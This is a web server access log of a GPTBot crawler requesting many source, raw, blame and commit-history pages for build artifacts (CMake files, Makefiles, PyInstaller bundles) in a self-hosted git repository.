[Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20387] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14304] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:01:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:01:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14306] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:01:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:15:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:15:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 9877] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:15:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:15:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 80799] [Gzip 29.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:15:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 130628] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:15:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 23475] [Gzip 11.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" -[17/Feb/2026:15:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10936] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" -[17/Feb/2026:15:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:15:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 14229700] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:15:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21618] [Gzip 15.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10221] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10936] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" -[17/Feb/2026:15:01:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 59754] [Gzip 16.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" -[17/Feb/2026:15:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 33418] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:15:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 9881] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:15:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51201] [Gzip 26.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" -[17/Feb/2026:15:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16896] [Gzip 10.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10220] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 9915] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:15:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51206] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 129724] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:15:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:01:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 80642] [Gzip 29.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:15:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 40959] [Gzip 14.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" -[17/Feb/2026:15:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:01:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51176] [Gzip 26.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:15:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 10375] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:15:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16184] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" -[17/Feb/2026:15:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -[17/Feb/2026:15:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10775] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" -[17/Feb/2026:15:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr 